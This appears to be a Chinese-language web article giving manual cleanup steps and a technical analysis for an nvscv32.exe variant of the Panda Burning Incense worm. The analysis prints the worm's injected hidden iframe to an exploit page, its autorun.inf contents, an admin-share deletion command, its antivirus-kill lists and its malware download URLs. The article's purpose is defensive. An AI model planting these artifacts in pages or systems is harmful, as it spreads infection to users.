熊貓燒香病毒nvscv32.exe變種手動(dòng)清除方案

一、PConline提供的解決方案
1.拔網(wǎng)線;
2.重新進(jìn)入WinXP安全模式,熊貓燒香病毒進(jìn)程沒有加載,可使用“任務(wù)管理器”?。ㄌ崾荆洪_機(jī)后按住F8)
3.刪除病毒文件:%SystemRoot%\system32\drivers\nvscv32.exe。
4.開始菜單=>運(yùn)行,運(yùn)行msconfig命令。在“系統(tǒng)配置實(shí)用程序”中,取消與nvscv32.exe相關(guān)的進(jìn)程。也可使用超級(jí)兔子魔法設(shè)置、HijackThis等,刪除nvscv32.exe的注冊(cè)表啟動(dòng)項(xiàng)。
取消熊貓燒香病毒進(jìn)程的啟動(dòng)
5.下載并使用江民專殺工具,修復(fù)被感染的exe文件。并及時(shí)打上Windows補(bǔ)丁。
6.清除html/asp/php等,所有網(wǎng)頁文件中如下代碼:(為防止傳播代碼有三處修改,請(qǐng)將“?!睋Q為“.”)
<iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”></iframe>
批量清除惡意代碼的方法:
- 可使用Dreamweaver的批量替換。
Dreamweaver批理替換的使用方法
- 可下載使用BatchTextReplacer批量替換。
- 部署了Symantec AntiVirus的企業(yè),升級(jí)到最新病毒庫掃描全盤文件,即可清除被添加的惡意代碼和清除病毒文件。
7.用安裝殺毒軟件,并升級(jí)病毒庫,掃描整個(gè)硬盤,清除其他病毒文件。推薦PConline多次推薦的“免費(fèi)卡巴斯基”——Active Virus Sheild。(xxxxxxxxxxxxx)(注:步驟7不能與步驟5調(diào)換,以免可修復(fù)的帶毒文件被刪除!)
8.刪除每個(gè)盤根目錄下的autorun.inf文件,利用搜索功能,將Desktop_.ini全部刪除。
二、互聯(lián)安全網(wǎng)提供的解決方法(后文的病毒描述、中毒現(xiàn)象和技術(shù)分析均來自互聯(lián)安全網(wǎng))
1:關(guān)閉網(wǎng)絡(luò)共享,斷開網(wǎng)絡(luò)。
2:使用IceSword結(jié)束掉nvscv32.exe進(jìn)程(速度要快,搶在病毒感染IceSword前)
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的數(shù)值改為1
4:刪除注冊(cè)表啟動(dòng)項(xiàng)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"
5:刪除C:\WINDOWS\system32\drivers\nvscv32.exe
6:刪除每個(gè)盤根目錄下的autorun.inf文件和setup.exe文件,利用搜索功能,將Desktop_.ini全部刪除。
7:如果電腦上有腳本文件,將病毒代碼全部刪除。
8:關(guān)閉系統(tǒng)的自動(dòng)播放功能。
這樣就基本上將病毒清除了。
三、病毒描述
含有病毒體的文件被運(yùn)行后,病毒將自身拷貝至系統(tǒng)目錄,同時(shí)修改注冊(cè)表將自身設(shè)置為開機(jī)啟動(dòng)項(xiàng),并遍歷各個(gè)驅(qū)動(dòng)器,將自身寫入磁盤根目錄下,增加一個(gè) Autorun.inf文件,使得用戶打開該盤時(shí)激活病毒體。隨后病毒體開一個(gè)線程進(jìn)行本地文件感染,并對(duì)局域網(wǎng)其他電腦進(jìn)行掃描,同時(shí)開另外一個(gè)線程連接某網(wǎng)站下載木馬程序進(jìn)行發(fā)動(dòng)惡意攻擊。
文件名稱:nvscv32.exe
病毒名稱:目前各殺毒軟件無法查殺(已經(jīng)將病毒樣本上報(bào)各殺毒廠商)
中文名稱:(尼姆亞,熊貓燒香)
病毒大?。?8,570 字節(jié)
編寫語言:Borland Delphi 6.0 - 7.0
加殼方式:FSG 2.0 -> bart/xt
發(fā)現(xiàn)時(shí)間:2007.1.16
危害等級(jí):高
四、中毒現(xiàn)象
1:在系統(tǒng)每個(gè)分區(qū)根目錄下存在setup.exe和autorun.inf文件(A和B盤不感染)。
2:無法手工修改“文件夾選項(xiàng)”將隱藏文件顯示出來。
3:在每個(gè)感染后的文件夾中可見Desktop_ini的隱藏文件,內(nèi)容為感染日期 如:2007-1-16
4:電腦上的所有腳本文件中加入以下代碼:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>
5:中毒后的機(jī)器上常見的反病毒軟件及防火墻無法正常開啟及運(yùn)行。
6:不能正常使用任務(wù)管理器,SREng.exe等工具。
7:無故的向外發(fā)包,連接局域網(wǎng)中其他機(jī)器。
五、技術(shù)分析
1:病毒文件運(yùn)行后,將自身復(fù)制到%SystemRoot%\system32\drivers\nvscv32.exe
建立注冊(cè)表自啟動(dòng)項(xiàng):
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"
2:查找反病毒窗體病毒結(jié)束相關(guān)進(jìn)程:
- 天網(wǎng)防火墻
- virusscan
- symantec antivirus
- system safety monitor
- system repair engineer
- wrapped gift killer
- 游戲木馬檢測(cè)大師
- 超級(jí)巡警
3:結(jié)束以下進(jìn)程
- mcshield.exe
- vstskmgr.exe
- naprdmgr.exe
- updaterui.exe
- tbmon.exe
- scan32.exe
- ravmond.exe
- ccenter.exe
- ravtask.exe
- rav.exe
- ravmon.exe
- ravmond.exe
- ravstub.exe
- kvxp.kxp
- kvmonxp.kxp
- kvcenter.kxp
- kvsrvxp.exe
- kregex.exe
- uihost.exe
- trojdie.kxp
- frogagent.exe
- kvxp.kxp
- kvmonxp.kxp
- kvcenter.kxp
- kvsrvxp.exe
- kregex.exe
- uihost.exe
- trojdie.kxp
- frogagent.exe
- logo1_.exe
- logo_1.exe
- rundl132.exe
- taskmgr.exe
- msconfig.exe
- regedit.exe
- sreng.exe
4:禁用下列服務(wù)
- schedule
- sharedaccess
- rsccenter
- rsravmon
- rsccenter
- kvwsc
- kvsrvxp
- kvwsc
- kvsrvxp
- kavsvc
- avp
- avp
- kavsvc
- mcafeeframework
- mcshield
- mctaskmanager
- mcafeeframework
- mcshield
- mctaskmanager
- navapsvc
- wscsvc
- kpfwsvc
- sndsrvc
- ccproxy
- ccevtmgr
- ccsetmgr
- spbbcsvc
- symantec core lc
- npfmntor
- mskservice
- firesvc
5:刪除下列注冊(cè)表項(xiàng):
- software\microsoft\windows\currentversion\run\ravtask
- software\microsoft\windows\currentversion\run\kvmonxp
- software\microsoft\windows\currentversion\run\kav
- software\microsoft\windows\currentversion\run\kavpersonal50
- software\microsoft\windows\currentversion\run\mcafeeupdaterui
- software\microsoft\windows\currentversion\run\network associates error reporting service
- software\microsoft\windows\currentversion\run\shstatexe
- software\microsoft\windows\currentversion\run\ylive.exe
- software\microsoft\windows\currentversion\run\yassistse
6:感染所有可執(zhí)行文件,并將圖標(biāo)改成(這次不是熊貓燒香那個(gè)圖標(biāo)了)
7:跳過下列目錄:
- windows
- winnt
- systemvolumeinformation
- recycled
- windowsnt
- windowsupdate
- windowsmediaplayer
- outlookexpress
- netmeeting
- commonfiles
- complusapplications
- commonfiles
- messenger
- installshieldinstallationinformation
- msn
- microsoftfrontpage
- moviemaker
- msngaminzone
8:刪除*.gho備份文件。
9:在所有驅(qū)動(dòng)器根目錄建立自身文件副本setup.exe,建立autorun.inf文件使病毒自動(dòng)運(yùn)行,設(shè)置文件屬性為隱藏、只讀、系統(tǒng)。
autorun.inf內(nèi)容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
10:刪除共享:cmd.exe /c net share admin$ /del /y
11:在機(jī)器上所有腳本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>,此代碼地址是一個(gè)利用MS-06014漏洞攻擊的網(wǎng)頁木馬,一旦用戶瀏覽中此病毒的服務(wù)器上的網(wǎng)頁,如果系統(tǒng)沒有打補(bǔ)丁,就會(huì)下載執(zhí)行此病毒。
12:掃描局域網(wǎng)機(jī)器,一旦發(fā)現(xiàn)漏洞,就迅速傳播。
13:在后臺(tái)訪問http://www。whboy。net/update/wormcn。txt,根據(jù)下載列表下載其他病毒。
目前下載列表如下:(以下鏈接均為危險(xiǎn)內(nèi)容,請(qǐng)勿點(diǎn)擊!)
- http://www.krvkr.com/down/cq.exe
- http://www.krvkr.com/down/mh.exe
- http://www.krvkr.com/down/my.exe
- http://www.krvkr.com/down/wl.exe
- http://www.krvkr.com/down/rx.exe
- http://www.krvkr.com/down/wow.exe
- http://www.krvkr.com/down/zt.exe
- http://www.krvkr.com/down/wm.exe
- http://www.krvkr.com/down/dj.exe
- http://www.krvkr.com/cn/iechajian.exe
到此病毒行為分析完畢。
相關(guān)文章
徹底關(guān)閉win10、win11系統(tǒng)自帶的windows defender殺毒功能(圖文詳解)
這篇文章主要介紹了徹底關(guān)閉win10、win11系統(tǒng)自帶的windows defender殺毒功能的詳細(xì)方法,這樣后續(xù)才能使用一些軟件2024-09-30火絨能恢復(fù)被刪除的文件嗎? 火絨恢復(fù)被當(dāng)成病毒刪除文件的方法
我們進(jìn)行電腦磁盤清理的時(shí)候,偶爾會(huì)出現(xiàn)被殺毒軟件誤刪除的情況,對(duì)于這種誤刪除的情況我們可以用火絨來進(jìn)行恢復(fù),想知道如何找回來,這里給朋友們分享火絨軟件恢復(fù)誤殺文2024-05-16電腦怎么關(guān)閉所有廣告彈窗? 一招關(guān)掉所有廣告包括360安全衛(wèi)士彈窗
電腦總是會(huì)出現(xiàn)各種廣告,該怎么禁止展示廣告呢?今天我們分享一招關(guān)掉所有廣告彈窗,包括360安全衛(wèi)士彈出的全部廣告窗口2024-05-09電腦360ai辦公如何關(guān)閉? 360安全衛(wèi)士ai辦公的關(guān)閉方法
電腦右下角總是出現(xiàn)ai圖標(biāo),誤點(diǎn)后會(huì)出現(xiàn)360ai辦公,想要關(guān)掉ai辦公圖標(biāo),該怎么操作呢?下面我們我們總結(jié)了多種解決辦法,詳細(xì)請(qǐng)看下文介紹2024-05-09怎么關(guān)閉360AI大會(huì)員彈窗廣告提示? 360安全衛(wèi)士ai大會(huì)員提醒關(guān)閉方法
360安全衛(wèi)士總是彈出ai大會(huì)員的推廣廣告,想要關(guān)閉這個(gè)彈窗,該怎么操作呢?我們點(diǎn)擊360設(shè)置中心,點(diǎn)擊彈窗設(shè)置,彈窗設(shè)置拉倒底,關(guān)閉AI大會(huì)員提醒2024-05-09火絨安裝不上怎么回事 安裝火絨安全軟件提示驅(qū)動(dòng)版本不匹配的解決辦法
有時(shí)候安裝火絨安全軟件時(shí),會(huì)跳出“驅(qū)動(dòng)版本不匹配,重啟電腦即可修復(fù)重啟”的提示界面,會(huì)有小伙伴不知道如何操作,可以先根據(jù)提示升級(jí)版本,然后啟動(dòng)試試2024-02-20火絨ip黑名單怎么添加ip段? 火絨ip黑名單功能的使用方法
使用電腦的時(shí)候有用戶想要限制指定IP進(jìn)出,那么在火絨安全中心中怎么開啟此功能和添加IP黑名單呢?下方是關(guān)于如何使用火絨安全軟件添加ip黑名單的具體操作方法2024-02-20MD5 、SHA1、SHA256 文件哈希校驗(yàn)方法分享
文件哈希運(yùn)算是指通過特定的算法將文件內(nèi)容轉(zhuǎn)化為固定長度的哈希值,用來嚴(yán)重我們從網(wǎng)上上下載的文件是否與官方提供的一致,因?yàn)楹芏嗲闆r下官方容易會(huì)被惡意修改掛馬等2024-02-08專業(yè)級(jí)文件MD5、SHA-256/512算法支持的校驗(yàn)工具(文件哈希校驗(yàn)器集合)
下面給大家推薦幾款好用的免費(fèi)的sha1、SHA-256校驗(yàn)工具軟件,網(wǎng)上下載的文件不知道是否被修改過,那么就需要這樣的工具了,需要的小伙伴們來了解一下2024-02-08魯大師被檢測(cè)為病毒怎么辦? win11魯大師顯示為病毒的處理方法
魯大師是一款專業(yè)的電腦硬件檢測(cè)工具,win11系統(tǒng)安裝完魯大師工具之后,卻被系統(tǒng)安全防護(hù)功能識(shí)別為病毒,對(duì)此魯大師被win11識(shí)別為病毒怎么辦呢?具體請(qǐng)看下文介紹2025-03-29